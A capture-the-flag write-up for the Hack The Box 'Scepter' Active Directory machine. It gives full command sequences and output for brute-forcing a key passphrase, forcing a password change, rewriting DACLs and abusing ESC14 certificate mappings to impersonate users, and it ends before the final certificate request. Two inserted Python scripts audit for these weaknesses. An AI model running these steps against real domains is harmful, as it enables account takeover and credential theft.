HTB Scepter

Write-up for the Hack the Box - Scepter - Hard machine.
Nmap scan
 ~ sudo nmap -sV -T4 -p- 10.10.11.65
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-20 15:23 CEST
Nmap scan report for 10.10.11.65
Host is up (0.015s latency).
Not shown: 65505 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-20 21:24:21Z)
111/tcp   open  rpcbind       2-4 (RPC #100000)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Looking into the nmap results:
  • port 88 (Kerberos), indicating AD.
  • port 445, check for anonymous/guest access.
  • port 2049 with the network lock manager, indicating an NFS service.
  • port 5985/5986, WinRM.

Setup hosts and krb5

Using ldapsearch -x -H ldap://10.10.11.65 -s base we can find the FQDN of the DC.
# setup /etc/hosts
echo "10.10.11.65  dc01.scepter.htb scepter.htb" | sudo tee -a /etc/hosts

# krb5.conf
[libdefaults]
 default_realm = SCEPTER.HTB
 dns_lookup_realm = false
 dns_lookup_kdc = false
 ticket_lifetime = 24h
 renew_lifetime = 7d
 forwardable = true

[realms]
 SCEPTER.HTB = {
     kdc = dc01.scepter.htb:88
     admin_server = dc01.scepter.htb:749
     default_domain = scepter.htb
 }

[domain_realm]
 .scepter.htb = SCEPTER.HTB
 scepter.htb = SCEPTER.HTB
No access to any SMB shares, so check which shares are available on NFS.
➜  ~ showmount -e 10.10.11.65
Export list for 10.10.11.65:
/helpdesk (everyone)
Then mount the share
sudo mount -t nfs 10.10.11.65:/helpdesk ./nfs/ -o nolock
The mounted share is owned by nobody and nogroup, so we have no access as a regular user.
➜  ~ ls -la | grep nfs
drwx------  2 nobody nogroup        64 Nov  2  2024 nfs
Change to root and open the share, we find several .crt, .key and .pfx files.
┌──(root㉿kali)-[/home/kali/nfs]
└─# ls
baker.crt  baker.key  clark.pfx  lewis.pfx  scott.pfx
A .pfx file is a container that stores private keys, public keys and certificates. Cracking clark.pfx, lewis.pfx and scott.pfx was not possible. A .pfx file can be used with Certipy to authenticate and get an NT hash or a TGT.

Creating a .pfx file

Having baker.crt and baker.key, it's possible to create a .pfx file; however, openssl asks for the pass phrase of the key.
openssl pkcs12 -export -out baker.pfx -inkey baker.key -in baker.crt
Enter pass phrase for baker.key:
Could not find private key from -inkey file from baker.key
40C7CA465D7F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
40C7CA465D7F0000:error:11800074:PKCS12 routines:PKCS12_pbe_crypt_ex:pkcs12 cipherfinal error:../crypto/pkcs12/p12_decr.c:92:empty password
We can brute force the pass phrase using openssl.
while IFS= read -r p; do
  echo "Trying $p"
  # Quote the candidate so spaces and shell metacharacters are passed literally
  openssl rsa -in baker.key -passin "pass:$p" -noout 2>/dev/null && echo "[+] Found password: $p" && break
done < /home/kali/rockyou.txt
Now try again to make the .pfx file, leave export password empty.
openssl pkcs12 -export -out /home/kali/baker.pfx -inkey baker.key -in baker.crt
Enter pass phrase for baker.key:
Enter Export Password:
Verifying - Enter Export Password:
Authenticating with Certipy gives a clock skew error; faketime works around that.
➜  ~ faketime -f $(ntpdate -q 10.10.11.65 | awk '{print $4}') bash

# Authenticate with certipy
└─$ certipy-ad auth -pfx /home/kali/baker.pfx -username d.baker -domain scepter.htb -dc-ip 10.10.11.65
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'd.baker@scepter.htb'
[*]     Security Extension SID: 'S-1-5-21-74879546-916818434-740295365-1106'
[*] Using principal: 'd.baker@scepter.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'd.baker.ccache'
[*] Wrote credential cache to 'd.baker.ccache'
[*] Trying to retrieve NT hash for 'd.baker'
[*] Got hash for 'd.baker@scepter.htb': aad3b435b51sdfsd3b435b51404ee:18b5fb0d9sdfsfdsf22ce

Domain Recon

# Getting users
└─$ nxc smb 10.10.11.65 -u d.baker -H 18b5fb0d99e7a475316213c15b6f22ce --users
SMB         10.10.11.65     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:scepter.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.65     445    DC01             [+] scepter.htb\d.baker:18b5fb0d99e7a475316213c15b6f22ce
SMB         10.10.11.65     445    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         10.10.11.65     445    DC01             Administrator                 2025-03-07 22:19:11 0       Built-in account for administering the computer/domain
SMB         10.10.11.65     445    DC01             Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         10.10.11.65     445    DC01             krbtgt                        2024-10-31 22:24:41 0       Key Distribution Center Service Account
SMB         10.10.11.65     445    DC01             d.baker                       2025-07-21 00:51:03 0
SMB         10.10.11.65     445    DC01             a.carter                      2025-07-21 00:51:03 0
SMB         10.10.11.65     445    DC01             h.brown                       2025-03-07 22:19:11 0
SMB         10.10.11.65     445    DC01             p.adams                       2024-11-02 08:00:25 0
SMB         10.10.11.65     445    DC01             e.lewis                       2024-11-02 01:07:14 0
SMB         10.10.11.65     445    DC01             o.scott                       2024-11-02 01:07:14 0
SMB         10.10.11.65     445    DC01             M.clark                       2024-11-02 01:07:14 0
SMB         10.10.11.65     445    DC01             [*] Enumerated 10 local users: SCEPTER
Use BloodHound to check the rights of d.baker.
➜  ~ bloodhound-ce-python -u d.baker --hashes :18b5fb0d99e7a475316213c15b6f22ce -d scepter.htb -dc dc01.scepter.htb -c All -ns 10.10.11.65
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: scepter.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 00M 02S
D.Baker can change the password of A.Carter.
A.Carter is a member of IT Support, which has GenericAll or Full Control over the OU, meaning any rights we apply on the OU are inherited by the objects inside it. dacledit.py can do this with its -inheritance flag.
We also find that D.Baker can enroll in the StaffAccessCertificate template, because D.Baker is in the staff group.
# Enrollment rights.
└─$ certipy-ad find -u d.baker@scepter.htb -k -no-pass -dc-ip 10.10.11.65 -target dc01.scepter.htb -dns-tcp -stdout -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Finding issuance policies
[*] Found 20 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'scepter-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'scepter-DC01-CA'
[*] Checking web enrollment for CA 'scepter-DC01-CA' @ 'dc01.scepter.htb'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : scepter-DC01-CA
    DNS Name                            : dc01.scepter.htb
    Certificate Subject                 : CN=scepter-DC01-CA, DC=scepter, DC=htb
    Certificate Serial Number           : 716BFFE1BE1CD1A24010F3AD0E350340
    Certificate Validity Start          : 2024-10-31 22:24:19+00:00
    Certificate Validity End            : 2061-10-31 22:34:19+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : SCEPTER.HTB\Administrators
      Access Rights
        ManageCa                        : SCEPTER.HTB\Administrators
                                          SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Enterprise Admins
        ManageCertificates              : SCEPTER.HTB\Administrators
                                          SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Enterprise Admins
        Enroll                          : SCEPTER.HTB\Authenticated Users
Certificate Templates


# interesting template
Template Name                       : StaffAccessCertificate

    Permissions
      Enrollment Permissions
        Enrollment Rights               : SCEPTER.HTB\staff
      Object Control Permissions
        Owner                           : SCEPTER.HTB\Enterprise Admins
        Full Control Principals         : SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Local System
                                          SCEPTER.HTB\Enterprise Admins
        Write Owner Principals          : SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Local System
                                          SCEPTER.HTB\Enterprise Admins
        Write Dacl Principals           : SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Local System
                                          SCEPTER.HTB\Enterprise Admins
Checking for vulnerable templates shows that it is flagged as vulnerable to ESC9.
# Find vulnerable templates
certipy-ad find -u d.baker@scepter.htb -k -no-pass -dc-ip 10.10.11.65 -target dc01.scepter.htb -dns-tcp -stdout -vulnerable

       Enrollment Rights               : SCEPTER.HTB\staff
      Object Control Permissions
        Owner                           : SCEPTER.HTB\Enterprise Admins
        Full Control Principals         : SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Local System
                                          SCEPTER.HTB\Enterprise Admins
        Write Owner Principals          : SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Local System
                                          SCEPTER.HTB\Enterprise Admins
        Write Dacl Principals           : SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Local System
                                          SCEPTER.HTB\Enterprise Admins
    [+] User Enrollable Principals      : SCEPTER.HTB\staff
    [!] Vulnerabilities
      ESC9                              : Template has no security extension.
    [*] Remarks
      ESC9                              : Other prerequisites may be required for this to be exploitable. See the wiki for more details
ESC9 exploits a weakness in how AD maps certificates to users. The output shows "Template has no security extension", which means the security checks tied to that extension are skipped. Normally only the right account can use the certificate, but here only the UPN is used to decide who the certificate belongs to. ESC9 requires a UPN, not an email address.

Requesting a certificate as D.Baker

When requesting a certificate for D.Baker we get an error saying CERTSRV_E_SUBJECT_EMAIL_REQUIRED. The CA is asking for subject email to have a value.
┌──(kali㉿kali)-[~]
└─$ certipy-ad req -u d.baker@scepter.htb -k -no-pass -dc-ip 10.10.11.65 -dc-host dc01.scepter.htb -target dc01.scepter.htb -ca scepter-DC01-CA -template StaffAccessCertificate -upn D.Baker
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 2
[-] Got error while requesting certificate: code: 0x80094812 - CERTSRV_E_SUBJECT_EMAIL_REQUIRED - The email name is unavailable and cannot be added to the Subject or Subject Alternate name.
Would you like to save the private key? (y/N): n
[-] Failed to request certificate
So we need to add an email address to D.Baker's mail attribute, which confirms we cannot use ESC9 here.

ESC14

Looking at all users, we find an interesting attribute on H.Brown: altSecurityIdentities X509:<RFC822>h.brown@scepter.htb. Looking for more information, I found https://www.thehacker.recipes/ad/movement/adcs/certificate-templates#esc14-a-write-access-on-altsecurityidentities.
Because we have Full Control over D.Baker's mail attribute and there are no security checks, we can place H.Brown's email address there, which returns a certificate that maps to H.Brown.
$ python3 GetWeakExplicitMappings.py --dc-host dc01.scepter.htb -u a.carter -p Pass@123 -d scepter.htb
[+] Connecion OK
[+] CN=h.brown,CN=Users,DC=scepter,DC=htb
   - X509:<RFC822>h.brown@scepter.htb
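
A defender-side view of the same finding, as an added example that is not part of the original write-up or of GetWeakExplicitMappings.py: it classifies altSecurityIdentities values as strong or weak (following the mapping types in Microsoft's KB5014754) and raises the severity when an enabled template with no security extension also copies the mail attribute into the certificate. The svc.vpn and t.legacy accounts, the User template and all raw flag values are constructed; the page does not show StaffAccessCertificate's flag bits.

```python
import re

# Template flag bits from MS-CRTD (msPKI-Enrollment-Flag / msPKI-Certificate-Name-Flag).
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000      # issued cert omits the requester-SID extension
CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL = 0x04000000  # SAN rfc822Name is filled from the 'mail' attribute

# altSecurityIdentities X509 mapping types, classified as in Microsoft's KB5014754.
MAPPING_TYPES = {
    ("I", "SR"): ("IssuerSerialNumber", "strong"),
    ("SKI",): ("SubjectKeyIdentifier", "strong"),
    ("SHA1-PUKEY",): ("SHA1PublicKey", "strong"),
    ("I", "S"): ("IssuerAndSubject", "weak"),
    ("S",): ("SubjectOnly", "weak"),
    ("RFC822",): ("RFC822Email", "weak"),
}
TAG_RE = re.compile(r"<([A-Za-z0-9-]+)>([^<]*)")

# Sample directory data. Only the h.brown value comes from the page; the rest is constructed.
ACCOUNTS = {
    "h.brown": ["X509:<RFC822>h.brown@scepter.htb"],
    "svc.vpn": ["X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>1200000000ac11000000002b"],
    "t.legacy": ["X509:<S>CN=t.legacy", "Kerberos:t.legacy@SCEPTER.HTB"],
}
# Flag values are assumptions chosen to match the behaviour the write-up describes.
TEMPLATES = [
    {"name": "StaffAccessCertificate", "enabled": True, "client_auth": True,
     "enrollment_flag": CT_FLAG_NO_SECURITY_EXTENSION,
     "name_flag": CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL},
    {"name": "User", "enabled": True, "client_auth": True,
     "enrollment_flag": 0x20, "name_flag": 0x02000000},
]


def parse_mapping(value):
    """Split one altSecurityIdentities value into its type, strength and fields."""
    if not value.upper().startswith("X509:"):
        # e.g. 'Kerberos:user@REALM' entries are not certificate mappings
        return {"raw": value, "type": "non-X509", "strength": "n/a", "fields": {}}
    tags = [(t.upper(), v.strip()) for t, v in TAG_RE.findall(value[5:])]
    kind, strength = MAPPING_TYPES.get(tuple(t for t, _ in tags), ("Unknown", "review"))
    return {"raw": value, "type": kind, "strength": strength, "fields": dict(tags)}


def email_templates_without_sid(templates):
    """Templates whose certificates carry a directory-sourced email but no SID extension."""
    return [
        t["name"] for t in templates
        if t["enabled"] and t["client_auth"]
        and t["enrollment_flag"] & CT_FLAG_NO_SECURITY_EXTENSION
        and t["name_flag"] & CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL
    ]


def audit(accounts, templates):
    """Return one finding per weak explicit mapping, highest severity first."""
    risky_templates = email_templates_without_sid(templates)
    findings = []
    for account, values in accounts.items():
        for value in values:
            m = parse_mapping(value)
            if m["strength"] != "weak":
                continue
            finding = {"account": account, "mapping": m["type"], "raw": value,
                       "severity": "medium", "templates": []}
            # An RFC822 mapping becomes reachable when some template copies the
            # enrollee's 'mail' attribute into a certificate with no SID binding.
            if m["type"] == "RFC822Email" and risky_templates:
                finding["severity"] = "high"
                finding["templates"] = risky_templates
            findings.append(finding)
    return sorted(findings, key=lambda f: f["severity"] != "high")


if __name__ == "__main__":
    for f in audit(ACCOUNTS, TEMPLATES):
        print(f["severity"], f["account"], f["mapping"], f["templates"])
```

Replacing a weak mapping with an issuer-and-serial or SKI mapping, or removing it, clears the finding for that account.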

The Attack

Changing the password of A.Carter
Using bloodyAD we change A.Carter's password.
# Get TGT
getTGT.py scepter.htb/d.baker -hashes :18b5fb0d99e7a475316213c15b6f22ce

# Change password
KRB5CCNAME=d.baker.ccache bloodyAD --host "dc01.scepter.htb" --dc-ip "10.10.11.65" -d "scepter.htb" -k set password "a.carter" "Pass@123"
[+] Password changed successfully!
We then give A.Carter FullControl over "Staff Access Certificate", using the -inheritance flag so the rights apply to any child object in the OU.
$ dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'A.Carter' -target-dn 'OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB' 'scepter.htb/A.Carter:Pass@123'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20250721-032716.bak
[*] DACL modified successfully!
Finally we can set the mail attribute of D.Baker to h.brown@scepter.htb.
$ bloodyAD -u a.carter -p 'Pass@123' -d scepter.htb --host dc01.scepter.htb set object D.Baker mail -v 'h.brown@scepter.htb'
[+] D.Baker's mail has been updated
Now we can request a certificate and use that certificate to get the NT hash or a TGT.
# Request certificate
$ certipy-ad req -u d.baker@scepter.htb -hashes 18b5fb0d99e7a475316ss3c15b6f22ce -target "dc01.scepter.htb" -ca "scepter-DC01-CA" -template "StaffAccessCertificate"
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: dc01.scepter.htb.
[!] Use -debug to print a stacktrace
[!] DNS resolution failed: The DNS query name does not exist: SCEPTER.HTB.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 3
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'd.baker.pfx'
[*] Wrote certificate and private key to 'd.baker.pfx'

# Authenticate 
─$ certipy-ad auth -pfx d.baker.pfx -username h.brown -domain scepter.htb -dc-ip 10.10.11.65
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'h.brown@scepter.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'h.brown.ccache'
[*] Wrote credential cache to 'h.brown.ccache'
[*] Trying to retrieve NT hash for 'h.brown'
[*] Got hash for 'h.brown@scepter.htb': aad3b435b51404eeaad3b435b51404ee:4ecf5242092sfw8c160a08069c75a0c

WinRM for user flag

─$ evil-winrm -i dc01.scepter.htb -r scepter.htb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\h.brown\Documents> ls ../Desktop

    Directory: C:\Users\h.brown\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        7/20/2025   2:17 PM             34 user.txt

Root

Finding a user that can DCSync the domain is the next target to focus on.
Looking for more vulnerable templates, we find HelpdeskEnrollmentCertificate, on which only Domain Admins and Enterprise Admins can enroll, which P.Adams is. So if we can request a certificate as P.Adams, we gain access to the domain as Domain Admins.
Certificate Templates
  0
    Template Name                       : HelpdeskEnrollmentCertificate
    Display Name                        : HelpdeskEnrollmentCertificate
    Certificate Authorities             : scepter-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
                                          SubjectRequireDnsAsCn
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 99 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-11-01T03:42:58+00:00
    Template Last Modified              : 2024-11-01T03:43:09+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Domain Computers
                                          SCEPTER.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SCEPTER.HTB\Administrator
        Full Control Principals         : SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Enterprise Admins
        Write Owner Principals          : SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Enterprise Admins
        Write Dacl Principals           : SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Enterprise Admins
        Write Property Enroll           : SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Domain Computers
                                          SCEPTER.HTB\Enterprise Admins
    [+] User Enrollable Principals      : SCEPTER.HTB\Domain Computers

Enumeration using dacledit in a simple loop.

Using dacledit.py in a loop we can enumerate all users against all users and groups to see if it finds anything interesting.
#!/bin/bash

DC_IP="10.10.11.65"
DOMAIN="scepter.htb"
AUTH="scepter.htb/h.brown"
PRINCIPAL_FILE="principal.txt"
TARGET_FILE="target.txt"

total_tests=0
matches=0

# Count total lines for estimated progress
num_principals=$(wc -l < "$PRINCIPAL_FILE")
num_targets=$(wc -l < "$TARGET_FILE")
total_combinations=$((num_principals * num_targets))
current=1

while IFS= read -r principal || [[ -n "$principal" ]]; do
    while IFS= read -r target || [[ -n "$target" ]]; do
        printf "[%4d/%4d] Testing: %s --> %s\r" "$current" "$total_combinations" "$principal" "$target"
        ((current++))
        ((total_tests++))

        output=$(python3 dacledit.py -k -action read \
            -principal "$principal" \
            -target "$target" \
            -dc-ip "$DC_IP" \
            "$AUTH" -no-pass 2>/dev/null)

        if echo "$output" | grep -q "ACE\["; then
            ((matches++))
            echo -e "\n\n[+] Match Found: $principal --> $target"
            echo "$output"
            echo
        fi
    done < "$TARGET_FILE"
done < "$PRINCIPAL_FILE"
After running for a while we get a result back.
 ./brute_scepter.sh
[  10/ 494] Testing: CMS --> p.adamsrrator

[+] Match Found: CMS --> p.adams
Impacket v0.13.0.dev0+20250721.105211.75610382 - Copyright Fortra, LLC and its affiliated companies

[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-74879546-916818434-740295365-1601)
[*]   ACE[24] info
[*]     ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
[*]     ACE flags                 : CONTAINER_INHERIT_ACE, INHERITED_ACE
[*]     Access mask               : WriteProperty (0x20)
[*]     Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
[*]     Object type (GUID)        : Alt-Security-Identities (00fbf30c-91fe-11d1-aebc-0000f80367c1)
[*]     Inherited type (GUID)     : User (bf967aba-0de6-11d0-a285-00aa003049e2)
[*]     Trustee (SID)             : CMS (S-1-5-21-74879546-916818434-740295365-1601)
[*]   ACE[25] info
[*]     ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
[*]     ACE flags                 : CONTAINER_INHERIT_ACE, INHERITED_ACE
[*]     Access mask               : ReadProperty (0x10)
[*]     Flags                     : ACE_INHERITED_OBJECT_TYPE_PRESENT
[*]     Inherited type (GUID)     : User (bf967aba-0de6-11d0-a285-00aa003049e2)
[*]     Trustee (SID)             : CMS (S-1-5-21-74879546-916818434-740295365-1601)
The output shows an ACCESS_ALLOWED_OBJECT_ACE that grants WriteProperty on Alt-Security-Identities to the trustee CMS, meaning members of CMS are allowed to write the altSecurityIdentities attribute. In BloodHound, H.Brown is MemberOf the CMS group, so we can use the H.Brown account to exercise WriteProperty.
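
For reviewing such output across many objects, the added example below (not part of the original write-up or of Impacket) parses dacledit.py read output and reports write access to altSecurityIdentities held by trustees outside an expected admin list. ACE[24] and ACE[25] are the ones printed above; ACE[26], the mask names other than WriteProperty and the allow-list are assumptions.

```python
import re

# GUID of the altSecurityIdentities attribute, as printed in the dacledit output above.
SENSITIVE_ATTRS = {"00fbf30c-91fe-11d1-aebc-0000f80367c1": "altSecurityIdentities"}
# Mask names treated as write access; only WriteProperty appears on the page,
# the others are assumed spellings of broader rights.
WRITE_RIGHTS = {"WriteProperty", "GenericWrite", "GenericAll", "FullControl"}
# Trustees expected to hold such rights (assumed policy; adjust per environment).
EXPECTED_TRUSTEES = {"Domain Admins", "Enterprise Admins", "Administrators"}

ACE_RE = re.compile(r"ACE\[(\d+)\] info")
KV_RE = re.compile(r"^\[\*\]\s+(.+?)\s+:\s+(.*)$")
GUID_RE = re.compile(r"\(([0-9a-fA-F-]{36})\)")

PAGE_OUTPUT = """\
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-74879546-916818434-740295365-1601)
[*]   ACE[24] info
[*]     ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
[*]     ACE flags                 : CONTAINER_INHERIT_ACE, INHERITED_ACE
[*]     Access mask               : WriteProperty (0x20)
[*]     Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
[*]     Object type (GUID)        : Alt-Security-Identities (00fbf30c-91fe-11d1-aebc-0000f80367c1)
[*]     Inherited type (GUID)     : User (bf967aba-0de6-11d0-a285-00aa003049e2)
[*]     Trustee (SID)             : CMS (S-1-5-21-74879546-916818434-740295365-1601)
[*]   ACE[25] info
[*]     ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
[*]     ACE flags                 : CONTAINER_INHERIT_ACE, INHERITED_ACE
[*]     Access mask               : ReadProperty (0x10)
[*]     Flags                     : ACE_INHERITED_OBJECT_TYPE_PRESENT
[*]     Inherited type (GUID)     : User (bf967aba-0de6-11d0-a285-00aa003049e2)
[*]     Trustee (SID)             : CMS (S-1-5-21-74879546-916818434-740295365-1601)
"""
# Constructed ACE (not from the page) to show the allow-list at work.
CONSTRUCTED_ACE = """\
[*]   ACE[26] info
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     ACE flags                 : None
[*]     Access mask               : FullControl (0xf01ff)
[*]     Trustee (SID)             : Domain Admins (S-1-5-21-74879546-916818434-740295365-512)
"""
SAMPLE = PAGE_OUTPUT + CONSTRUCTED_ACE


def parse_dacledit(text):
    """Turn dacledit's '[*] key : value' blocks into one dict per ACE."""
    aces, current = [], None
    for line in text.splitlines():
        line = line.strip()
        start = ACE_RE.search(line)
        if start:
            current = {"index": int(start.group(1))}
            aces.append(current)
            continue
        kv = KV_RE.match(line)
        if kv and current is not None:
            current[kv.group(1)] = kv.group(2).strip()
    return aces


def names(value):
    """'A, B (0x20)' -> {'A', 'B'}"""
    cleaned = re.sub(r"\(0x[0-9a-fA-F]+\)", "", value)
    return {part.strip() for part in cleaned.split(",") if part.strip()}


def risky_aces(aces):
    """Allow-ACEs that let an unexpected trustee write a sensitive attribute."""
    findings = []
    for ace in aces:
        if "ALLOWED" not in ace.get("ACE Type", ""):
            continue
        if not names(ace.get("Access mask", "")) & WRITE_RIGHTS:
            continue
        guid = GUID_RE.search(ace.get("Object type (GUID)", ""))
        if guid:
            attr = SENSITIVE_ATTRS.get(guid.group(1).lower())
            if attr is None:
                continue  # write is scoped to an attribute we are not tracking
        else:
            attr = "all properties"  # no object type: the write is unscoped
        trustee, _, sid = ace.get("Trustee (SID)", "").partition(" (")
        if trustee in EXPECTED_TRUSTEES:
            continue
        findings.append({"index": ace["index"], "trustee": trustee,
                         "sid": sid.rstrip(")"), "attribute": attr,
                         "inherited": "INHERITED_ACE" in names(ace.get("ACE flags", ""))})
    return findings


if __name__ == "__main__":
    for finding in risky_aces(parse_dacledit(SAMPLE)):
        print(finding)
```

An inherited finding, like ACE[24] here, has to be fixed on the parent OU rather than on the user object.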

ESC14

When a user logs in and presents something other than a password (e.g., smart cards, external PKI or a certificate), Windows checks what is in altSecurityIdentities. By adding a reference to a certificate in someone's altSecurityIdentities attribute, it is possible to log in as that user or computer.
In this case we use the H.Brown account to set an X509RFC822 mapping, X509:<RFC822>p.adams@scepter.htb.
# Set altSecurityIdentities attribute
bloodyAD --host DC01.scepter.htb -d scepter.htb -k set object p.adams altSecurityIdentities -v 'X509:<RFC822>p.adams@scepter.htb'
[+] p.adams's altSecurityIdentities has been updated

# Check 
bloodyAD --host DC01.scepter.htb -d scepter.htb -k get object p.adams --attr altSecurityIdentities

distinguishedName: CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
altSecurityIdentities: X509:<RFC822>p.adams@scepter.htb
Now we need to repeat the earlier steps, this time changing the mail of D.Baker to p.adams@scepter.htb.
# Change password again for A.Carter
KRB5CCNAME=d.baker.ccache bloodyAD --host "dc01.scepter.htb" --dc-ip "10.10.11.65" -d "scepter.htb" -k set password "a.carter" "Pass@123"

# Get FullControl
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'a.carter' -target-dn 'OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB' 'scepter.htb'/'a.carter':'Pass@123'
Impacket v0.13.0.dev0+20250721.105211.75610382 - Copyright Fortra, LLC and its affiliated companies

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20250722-024758.bak
[*] DACL modified successfully!

# Change mail d.baker
bloodyAD -d "scepter.htb" -u "a.carter" -p 'Pass@123' --host "dc01.scepter.htb" set object "d.baker" mail -v "p.adams@scepter.htb"
[+] d.baker's mail has been updated

# Request certificate
